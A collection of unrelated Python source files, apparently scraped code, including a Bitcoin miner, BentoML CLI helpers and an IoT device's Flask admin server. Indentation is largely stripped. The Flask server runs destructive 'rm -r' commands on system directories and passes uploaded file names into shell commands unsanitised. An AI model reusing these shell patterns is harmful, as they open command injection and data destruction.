if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
mul_thread.py
|
import threading
import time
from threading import Thread
def deal_time():
    current_thread = threading.current_thread()
    print(f"time is {time.time()}, current thread is {current_thread}")
for index in range(10):
thread = Thread(target=deal_time, name="deal_time" + str(index))
thread.start()
print("输出主线程信息", threading.current_thread())
num = 0
def sum_value():
global num
for index in range(10000):
num += index
sum_value()
# thread_sum = Thread(target=sum_value)
# thread_sum1 = Thread(target=sum_value)
# thread_sum.start()
# thread_sum1.start()
# thread_sum.join()
# thread_sum1.join()
print(f"num is {num}")
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
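# Illustrative sketch (not in the original miner): on a sample 8-byte buffer,
# bufreverse() flips the byte order within each 32-bit word, while
# wordreverse() reverses the order of the 32-bit words themselves:
#
#     bytereverse(0x12345678)                        == 0x78563412
#     bufreverse('\x01\x02\x03\x04\x05\x06\x07\x08') == '\x04\x03\x02\x01\x08\x07\x06\x05'
#     wordreverse('\x01\x02\x03\x04\x05\x06\x07\x08') == '\x05\x06\x07\x08\x01\x02\x03\x04'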
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 3471
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
stable_radical_opt.py
|
import argparse
import logging
import math
import os
import pathlib
from rlmolecule.sql.run_config import RunConfig
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
from stable_radical_problem import construct_problem
def run_games(run_config: RunConfig, **kwargs) -> None:
from rlmolecule.alphazero.alphazero import AlphaZero
config = run_config.mcts_config
game = AlphaZero(
construct_problem(run_config, **kwargs),
min_reward=config.get('min_reward', 0.0),
pb_c_base=config.get('pb_c_base', 1.0),
pb_c_init=config.get('pb_c_init', 1.25),
dirichlet_noise=config.get('dirichlet_noise', True),
dirichlet_alpha=config.get('dirichlet_alpha', 1.0),
dirichlet_x=config.get('dirichlet_x', 0.25),
# MCTS parameters
ucb_constant=config.get('ucb_constant', math.sqrt(2)),
)
while True:
path, reward = game.run(
num_mcts_samples=config.get('num_mcts_samples', 50),
timeout=config.get('timeout', None),
max_depth=config.get('max_depth', 1000000),
)
logger.info(f'Game Finished -- Reward {reward.raw_reward:.3f} -- Final state {path[-1][0]}')
def train_model(run_config: RunConfig, **kwargs) -> None:
config = run_config.train_config
construct_problem(run_config, **kwargs).train_policy_model(
steps_per_epoch=config.get('steps_per_epoch', 100),
lr=float(config.get('lr', 1E-3)),
epochs=int(float(config.get('epochs', 1E4))),
game_count_delay=config.get('game_count_delay', 20),
verbose=config.get('verbose', 2)
)
def setup_argparser():
parser = argparse.ArgumentParser(
description='Optimize stable radicals to work as both the anode and cathode of a redox-flow battery.')
parser.add_argument('--config', type=str, help='Configuration file')
parser.add_argument('--train-policy',
action="store_true",
default=False,
help='Train the policy model only (on GPUs)')
parser.add_argument('--rollout',
action="store_true",
default=False,
help='Run the game simulations only (on CPUs)')
# '/projects/rlmolecule/pstjohn/models/20210214_radical_stability_new_data/',
parser.add_argument('--stability-model',
'-S',
type=pathlib.Path,
required=True,
help='Radical stability model for computing the electron spin and buried volume')
# '/projects/rlmolecule/pstjohn/models/20210214_redox_new_data/',
parser.add_argument('--redox-model',
'-R',
type=pathlib.Path,
required=True,
help='Redox model for computing the ionization_energy and electron_affinity')
# '/projects/rlmolecule/pstjohn/models/20210216_bde_new_nfp/',
parser.add_argument('--bde-model',
'-B',
type=pathlib.Path,
required=True,
help='BDE model for computing the Bond Dissociation Energy')
return parser
if __name__ == "__main__":
parser = setup_argparser()
args = parser.parse_args()
kwargs = vars(args)
run_config = RunConfig(args.config)
if args.train_policy:
train_model(run_config, **kwargs)
elif args.rollout:
# make sure the rollouts do not use the GPU
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
run_games(run_config, **kwargs)
else:
print("Must specify either --train-policy or --rollout")
# else:
# jobs = [multiprocessing.Process(target=monitor)]
# jobs[0].start()
# time.sleep(1)
# for i in range(5):
# jobs += [multiprocessing.Process(target=run_games)]
# jobs += [multiprocessing.Process(target=train_model)]
# for job in jobs[1:]:
# job.start()
# for job in jobs:
# job.join(300)
|
utils.py
|
# Copyright 2019 Atalaya Tech, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import sys
import threading
import itertools
import time
import logging
from datetime import datetime
import humanfriendly
from google.protobuf.json_format import MessageToDict
from tabulate import tabulate
from bentoml.cli.click_utils import _echo
from bentoml.proto.deployment_pb2 import DeploymentState, DeploymentSpec
from bentoml.utils import pb_to_yaml
logger = logging.getLogger(__name__)
class Spinner:
def __init__(self, message, delay=0.1):
self.spinner = itertools.cycle(['-', '/', '|', '\\'])
self.delay = delay
self.busy = False
self._screen_lock = None
self.thread = None
self.spinner_visible = False
sys.stdout.write(message)
def write_next(self):
with self._screen_lock:
if not self.spinner_visible:
sys.stdout.write(next(self.spinner))
self.spinner_visible = True
sys.stdout.flush()
def remove_spinner(self, cleanup=False):
with self._screen_lock:
if self.spinner_visible:
sys.stdout.write('\b')
self.spinner_visible = False
if cleanup:
sys.stdout.write(' ') # overwrite spinner with blank
                    sys.stdout.write('\r')  # return cursor to the start of the line
sys.stdout.flush()
def spinner_task(self):
while self.busy:
self.write_next()
time.sleep(self.delay)
self.remove_spinner()
def __enter__(self):
if sys.stdout.isatty():
self._screen_lock = threading.Lock()
self.busy = True
self.thread = threading.Thread(target=self.spinner_task)
self.thread.start()
def __exit__(self, exception, value, tb):
if sys.stdout.isatty():
self.busy = False
self.remove_spinner(cleanup=True)
else:
sys.stdout.write('\r')
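# Hedged usage sketch (not part of the original module): Spinner is intended
# to be used as a context manager around a long-running CLI operation, e.g.
#
#     with Spinner('Deploying to the cloud... '):
#         result = do_long_running_deploy()  # hypothetical long-running call
#
# When stdout is a TTY the spinner animates in a background thread; otherwise
# __enter__/__exit__ degrade to a plain carriage return.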
def parse_key_value_pairs(key_value_pairs_str):
result = {}
if key_value_pairs_str:
for key_value_pair in key_value_pairs_str.split(','):
key, value = key_value_pair.split('=')
key = key.strip()
value = value.strip()
if key in result:
logger.warning("duplicated key '%s' found string map parameter", key)
result[key] = value
return result
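# Illustrative example (values are hypothetical): a comma-separated key=value
# string is parsed into a dict, with surrounding whitespace stripped and later
# duplicates overriding earlier ones:
#
#     parse_key_value_pairs('env=prod, region=us-west-2')
#     # -> {'env': 'prod', 'region': 'us-west-2'}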
def _print_deployment_info(deployment, output_type):
if output_type == 'yaml':
_echo(pb_to_yaml(deployment))
else:
deployment_info = MessageToDict(deployment)
if deployment_info['state']['infoJson']:
deployment_info['state']['infoJson'] = json.loads(
deployment_info['state']['infoJson']
)
_echo(json.dumps(deployment_info, indent=2, separators=(',', ': ')))
def _format_labels_for_print(labels):
if not labels:
return None
result = []
for label_key in labels:
result.append(
'{label_key}:{label_value}'.format(
label_key=label_key, label_value=labels[label_key]
)
)
return '\n'.join(result)
def _format_deployment_age_for_print(deployment_pb):
if not deployment_pb.created_at:
# deployments created before version 0.4.5 don't have created_at field,
# we will not show the age for those deployments
return None
else:
deployment_duration = datetime.utcnow() - deployment_pb.created_at.ToDatetime()
return humanfriendly.format_timespan(deployment_duration)
def _print_deployments_table(deployments):
table = []
headers = ['NAME', 'NAMESPACE', 'LABELS', 'PLATFORM', 'STATUS', 'AGE']
for deployment in deployments:
row = [
deployment.name,
deployment.namespace,
_format_labels_for_print(deployment.labels),
DeploymentSpec.DeploymentOperator.Name(deployment.spec.operator)
.lower()
.replace('_', '-'),
DeploymentState.State.Name(deployment.state.state)
.lower()
.replace('_', ' '),
_format_deployment_age_for_print(deployment),
]
table.append(row)
table_display = tabulate(table, headers, tablefmt='plain')
_echo(table_display)
def _print_deployments_info(deployments, output_type):
if output_type == 'table':
_print_deployments_table(deployments)
else:
for deployment in deployments:
_print_deployment_info(deployment, output_type)
|
rest_manager.py
|
# Copyright 2017 MDSLAB - University of Messina
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
__author__ = "Nicola Peditto <n.peditto@gmail.com>"
from iotronic_lightningrod.common.pam import pamAuthentication
from iotronic_lightningrod.common import utils
from iotronic_lightningrod.lightningrod import board
from iotronic_lightningrod.lightningrod import iotronic_status
from iotronic_lightningrod.modules import device_manager
from iotronic_lightningrod.modules import Module
from iotronic_lightningrod.modules import service_manager
from iotronic_lightningrod.modules import utils as lr_utils
from datetime import datetime
from flask import Flask
from flask import redirect
from flask import render_template
from flask import request
from flask import send_file
from flask import session as f_session
from flask import url_for
from flask import abort
# from flask import Response
import os
import subprocess
import threading
from oslo_config import cfg
from oslo_log import log as logging
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class RestManager(Module.Module):
def __init__(self, board, session=None):
super(RestManager, self).__init__("RestManager", board)
def finalize(self):
threading.Thread(target=self._runRestServer, args=()).start()
def restore(self):
pass
def _runRestServer(self):
APP_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATE_PATH = os.path.join(APP_PATH, 'modules/web/templates/')
STATIC_PATH = os.path.join(APP_PATH, 'modules/web/static/')
app = Flask(
__name__,
template_folder=TEMPLATE_PATH,
static_folder=STATIC_PATH,
static_url_path="/static"
)
app.secret_key = os.urandom(24).hex() # to use flask session
UPLOAD_FOLDER = '/tmp'
ALLOWED_EXTENSIONS = set(['tar.gz', 'gz'])
        ALLOWED_SETTINGS_EXTENSIONS = set(['json'])
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
@app.route('/')
def home():
if 'username' in f_session:
return render_template('home.html')
else:
return render_template('login.html')
def redirect_dest(fallback):
dest = request.args.get('next')
try:
dest_url = url_for(dest)
except Exception:
return redirect(fallback)
return redirect(dest_url)
@app.route('/login', methods=['GET', 'POST'])
def login():
error = None
if request.method == 'POST':
if pamAuthentication(
str(request.form['username']),
str(request.form['password'])
):
f_session['username'] = request.form['username']
return redirect_dest(fallback="/")
else:
error = 'Invalid Credentials. Please try again.'
if 'username' in f_session:
return render_template('home.html')
else:
return render_template('login.html', error=error)
@app.route('/logout')
def logout():
# remove the username from the session if it's there
f_session.pop('username', None)
return redirect("/login", code=302)
@app.route('/info')
def info():
wstun_status = service_manager.wstun_status()
if wstun_status == 0:
wstun_status = "Online"
else:
wstun_status = "Offline"
service_list = service_manager.services_list("list")
if service_list == "":
service_list = "no services exposed!"
lr_cty = "N/A"
from iotronic_lightningrod.lightningrod import wport
sock_bundle = lr_utils.get_socket_info(wport)
if sock_bundle != "N/A":
lr_cty = sock_bundle[2] + " - " + sock_bundle[0] \
+ " - " + sock_bundle[1]
webservice_list = []
nginx_path = "/etc/nginx/conf.d/"
if os.path.exists(nginx_path):
active_webservice_list = [f for f in os.listdir(nginx_path)
if os.path.isfile(os.path.join(nginx_path, f))]
if len(active_webservice_list) != 0:
for ws in active_webservice_list:
ws = ws.replace('.conf', '')
webservice_list.append(ws)
info = {
'board_id': board.uuid,
'board_name': board.name,
'wagent': board.agent,
'session_id': board.session_id,
'timestamp': str(
datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f')),
'wstun_status': wstun_status,
'board_reg_status': str(board.status),
'iotronic_status': str(iotronic_status(board.status)),
'service_list': service_list,
'webservice_list': webservice_list,
'serial_dev': device_manager.getSerialDevice(),
'nic': lr_cty,
'lr_version': str(
utils.get_version("iotronic-lightningrod")
)
}
return info, 200
@app.route('/status')
def status():
try:
if ('username' in f_session):
f_session['status'] = str(board.status)
wstun_status = service_manager.wstun_status()
if wstun_status == 0:
wstun_status = "Online"
else:
wstun_status = "Offline"
service_list = service_manager.services_list("html")
if service_list == "":
service_list = "no services exposed!"
webservice_list = ""
nginx_path = "/etc/nginx/conf.d/"
if os.path.exists(nginx_path):
active_webservice_list = [
f for f in os.listdir(nginx_path)
if os.path.isfile(os.path.join(nginx_path, f))
]
for ws in active_webservice_list:
ws = ws.replace('.conf', '')[3:]
webservice_list = webservice_list + "\
<li>" + ws + "</li>"
else:
webservice_list = "no webservices exposed!"
if webservice_list == "":
webservice_list = "no webservices exposed!"
lr_cty = "N/A"
from iotronic_lightningrod.lightningrod import wport
sock_bundle = lr_utils.get_socket_info(wport)
if sock_bundle != "N/A":
lr_cty = sock_bundle[2] + " - " + sock_bundle[0] \
+ " - " + sock_bundle[1]
info = {
'board_id': board.uuid,
'board_name': board.name,
'wagent': board.agent,
'session_id': board.session_id,
'timestamp': str(
datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f')),
'wstun_status': wstun_status,
'board_reg_status': str(board.status),
'iotronic_status': str(iotronic_status(board.status)),
'service_list': str(service_list),
'webservice_list': str(webservice_list),
'serial_dev': device_manager.getSerialDevice(),
'nic': lr_cty,
'lr_version': str(
utils.get_version("iotronic-lightningrod")
)
}
return render_template('status.html', **info)
else:
return redirect(url_for('login', next=request.endpoint))
except Exception as err:
LOG.error(err)
info = {
'messages': [str(err)]
}
return render_template('status.html', **info)
@app.route('/system')
def system():
if 'username' in f_session:
info = {
'board_status': board.status
}
return render_template('system.html', **info)
else:
return redirect(url_for('login', next=request.endpoint))
@app.route('/network')
def network():
if 'username' in f_session:
info = {
'ifconfig': device_manager.getIfconfig()
}
return render_template('network.html', **info)
else:
return redirect(url_for('login', next=request.endpoint))
def lr_config(ragent, code):
bashCommand = "lr_configure %s %s " % (code, ragent)
process = subprocess.Popen(bashCommand.split(),
stdout=subprocess.PIPE)
output, error = process.communicate()
return
def change_hostname(hostname):
if hostname != "":
bashCommand = "hostname %s " % (hostname)
process = subprocess.Popen(bashCommand.split(),
stdout=subprocess.PIPE)
output, error = process.communicate()
else:
print("- No hostname specified!")
return
def lr_install():
bashCommand = "lr_install"
process = subprocess.Popen(bashCommand.split(),
stdout=subprocess.PIPE)
output, error = process.communicate()
return
def identity_backup():
bashCommand = "device_bkp_rest backup --path /tmp "\
+ "| grep filename: |awk '{print $4}'"
process = subprocess.Popen(bashCommand,
stdout=subprocess.PIPE, shell=True)
output, error = process.communicate()
return output.decode('ascii').strip()
def identity_restore(filepath):
bashCommand = "device_bkp_rest restore " \
+ str(filepath) + "| tail -n 1"
process = subprocess.Popen(bashCommand,
stdout=subprocess.PIPE, shell=True)
output, error = process.communicate()
return output.decode('ascii').strip()
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
def allowed_settings(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() \
                in ALLOWED_SETTINGS_EXTENSIONS
@app.route('/restore', methods=['GET', 'POST'])
def upload_file():
if ('username' in f_session) or str(board.status) == "first_boot":
f_session['status'] = str(board.status)
if request.form.get('dev_rst_btn') == 'Device restore':
if 'rst_file' not in request.files:
error = 'Identity restore result: No file uploaded!'
print(" - " + error)
info = {
'board_status': board.status
}
return render_template(
'config.html',
**info,
error=error
)
else:
file = request.files['rst_file']
if file.filename == '':
error = 'Identity restore result: No filename!'
print(" - " + error)
info = {
'board_status': board.status
}
return render_template('config.html', **info,
error=error)
else:
filename = file.filename
print("Identity file uploaded: " + str(filename))
if file and allowed_file(file.filename):
bpath = os.path.join(
app.config['UPLOAD_FOLDER'],
filename
)
bpath = bpath.replace(" ", "")
bpath = bpath.replace("(", "-")
bpath = bpath.replace(")", "-")
print("--> storage path: " + str(bpath))
file.save(bpath)
out_res = identity_restore(bpath)
print("--> restore result: " + str(out_res))
# restart LR
print("--> LR restarting in 5 seconds...")
f_session['status'] = "restarting"
lr_utils.LR_restart_delayed(5)
return redirect("/", code=302)
else:
error = 'Identity restore result: ' \
                                + 'file extension not allowed!'
print(" - " + error)
info = {
'board_status': board.status
}
return render_template(
'config.html',
**info,
error=error
)
# return redirect("/config", code=302)
else:
return redirect("/", code=302)
else:
return redirect(url_for('login', next=request.endpoint))
@app.route('/backup', methods=['GET'])
def backup_download():
# LOG.info(request.query_string)
# LOG.info(request.__dict__)
if 'username' in f_session:
print("Identity file downloading: ")
filename = identity_backup()
print("--> backup created:" + str(filename))
path = str(filename)
if path is None:
print("Error path None")
try:
print("--> backup file sent.")
return send_file(path, as_attachment=True)
except Exception as e:
print(e)
else:
return redirect(url_for('login', next=request.endpoint))
@app.route('/factory', methods=['GET'])
def factory_reset():
if 'username' in f_session:
print("Lightning-rod factory reset: ")
f_session['status'] = str(board.status)
# delete nginx conf.d files
os.system("rm /etc/nginx/conf.d/lr_*")
print("--> NGINX settings deleted.")
# delete letsencrypt
os.system("rm -r /etc/letsencrypt/*")
print("--> LetsEncrypt settings deleted.")
# delete var-iotronic
os.system("rm -r /var/lib/iotronic/*")
print("--> Iotronic data deleted.")
# delete etc-iotronic
os.system("rm -r /etc/iotronic/*")
print("--> Iotronic settings deleted.")
# exec lr_install
lr_install()
# restart LR
print("--> LR restarting in 5 seconds...")
f_session['status'] = "restarting"
lr_utils.LR_restart_delayed(5)
return redirect("/", code=302)
else:
return redirect(url_for('login', next=request.endpoint))
@app.route('/config', methods=['GET', 'POST'])
def config():
if ('username' in f_session) or str(board.status) == "first_boot":
f_session['status'] = str(board.status)
if request.method == 'POST':
req_body = request.get_json()
LOG.debug(req_body)
                    if req_body is not None:
if 'action' in req_body:
if req_body['action'] == "configure":
LOG.info("API LR configuration")
ragent = req_body['urlwagent']
code = req_body['code']
lr_config(ragent, code)
if 'hostname' in req_body:
if req_body['hostname'] != "":
change_hostname(req_body['hostname'])
return {"result": "LR configured, \
authenticating..."}, 200
else:
abort(400)
elif request.form.get('reg_btn') == 'CONFIGURE':
ragent = request.form['urlwagent']
code = request.form['code']
lr_config(ragent, code)
hostname = request.form['hostname']
change_hostname(hostname)
return redirect("/status", code=302)
elif request.form.get('rst_btn') == 'RESTORE':
utils.restoreConf()
print("Restored")
f_session['status'] = "restarting"
return redirect("/", code=302)
elif request.form.get('fct_btn'):
utils.restoreFactoryConf()
print("Refactored")
print("--> LR restarting in 5 seconds...")
f_session['status'] = "restarting"
lr_utils.LR_restart_delayed(5)
return redirect("/", code=302)
elif request.form.get('change_hostname'):
hostname = request.form['hostname']
change_hostname(hostname)
return redirect("/system", code=302)
elif request.form.get('rst_settings_btn'):
print("Settings restoring from uploaded backup...")
if len(request.files) != 0:
if 'rst_settings_file' in request.files:
file = request.files['rst_settings_file']
if file.filename == '':
error = 'Settings restore result: ' \
+ 'No filename!'
print(" - " + error)
info = {
'board_status': board.status
}
return render_template(
'config.html',
**info,
error=error
)
else:
filename = file.filename
print(" - file uploaded: " + str(filename))
if file and allowed_settings(filename):
bpath = os.path.join(
app.config['UPLOAD_FOLDER'],
filename
)
file.save(bpath)
try:
os.system(
'cp '
+ bpath
+ ' /etc/iotronic/'
+ 'settings.json'
)
except Exception as e:
LOG.warning(
"Error restoring " +
"configuration " + str(e))
print(" - done!")
if board.status == "first_boot":
# start LR
print(" - LR starting "
+ "in 5 seconds...")
f_session['status'] = "starting"
else:
# restart LR
print(" - LR restarting "
+ "in 5 seconds...")
f_session['status'] = "restarting"
lr_utils.LR_restart_delayed(5)
return redirect("/", code=302)
else:
                                        error = 'Wrong file extension: ' \
+ str(filename)
print(" - " + error)
info = {
'board_status': board.status
}
return render_template(
'config.html',
**info,
error=error
)
else:
error = 'input form error!'
print(" - " + error)
info = {
'board_status': board.status
}
return render_template('config.html', **info,
error=error)
else:
error = "no settings file specified!"
print(" - " + error)
info = {
'board_status': board.status
}
return render_template(
'config.html',
**info,
error=error
)
return redirect("/config", code=302)
else:
print("Error POST request")
return redirect("/status", code=302)
else:
if board.status == "first_boot":
urlwagent = request.args.get('urlwagent') or ""
code = request.args.get('code') or ""
info = {
'urlwagent': urlwagent,
'code': code,
'board_status': board.status
}
return render_template('config.html', **info)
else:
if request.args.get('bkp_btn'):
# utils.backupConf()
print("Settings file downloading: ")
path = "/etc/iotronic/settings.json"
if path is None:
print("Error path None")
return redirect("/config", code=500)
try:
fn_download = "settings_" + str(
datetime.now().strftime(
'%Y-%m-%dT%H:%M:%S.%f')) + ".json"
print("--> backup settings file sent.")
return send_file(
path,
as_attachment=True,
attachment_filename=fn_download
)
except Exception as e:
print(e)
return redirect("/config", code=500)
elif request.args.get('rst_btn'):
utils.restoreConf()
print("Restored")
return redirect("/config", code=302)
elif request.args.get('fct_btn'):
utils.restoreFactoryConf()
print("Refactored")
print("--> LR restarting in 5 seconds...")
f_session['status'] = "restarting"
lr_utils.LR_restart_delayed(5)
return redirect("/", code=302)
elif request.args.get('lr_restart_btn'):
print("LR restarting in 5 seconds...")
f_session['status'] = "restarting"
lr_utils.LR_restart_delayed(5)
return redirect("/", code=302)
else:
info = {
'board_status': board.status
}
return render_template('config.html', **info)
else:
if request.method == 'POST':
req_body = request.get_json()
                if req_body is not None and str(board.status) != "first_boot":
return {"result": "LR already configured!"}, 403
return redirect(url_for('login', next=request.endpoint))
app.run(host='0.0.0.0', port=1474, debug=False, use_reloader=False)
|
altwatcher.py
|
#!/usr/bin/env python
# NOTE: Python 3.6 is required
import curses, datetime, coinmarketcap, pickle, sys, threading, time, traceback
from collections import defaultdict
cmc = coinmarketcap.Market()
histories = defaultdict(list) # A map of form: "CUR1/CUR2": [CONVERSION...]
histfile = "/tmp/cmchistory.pickle"
last, updated = datetime.datetime.now(), []
pairs = (
"bitcoin/ethereum",
"bitcoin/litecoin",
"ethereum/litecoin",
"nano/decred",
)
def tick(c1, c2):
ct1 = cmc.ticker(c1)[0]
ct2 = cmc.ticker(c2)[0]
forward = float(ct1["price_usd"]) / float(ct2["price_usd"])
timestamp = datetime.datetime.fromtimestamp(int(ct1["last_updated"]))
ticker = f"{c1}/{c2}"
# Only add changed values.
try:
if str(forward) == str(histories[ticker][-1][1]):
return
except IndexError:
pass
global updated
updated.append(ticker)
histories[ticker].append((timestamp, forward))
def do_tick(event):
sleeptime = 30
sleep = 0
while not event.wait(1):
# Loop with a more fine-grained interrupt schedule.
if sleep > 0:
sleep -= 1
time.sleep(1)
continue
sleep = sleeptime
# Update the price histories.
last = datetime.datetime.now()
try:
for pair in pairs:
tick(*pair.split("/"))
        except Exception:
# Don't spit out errors.
pass
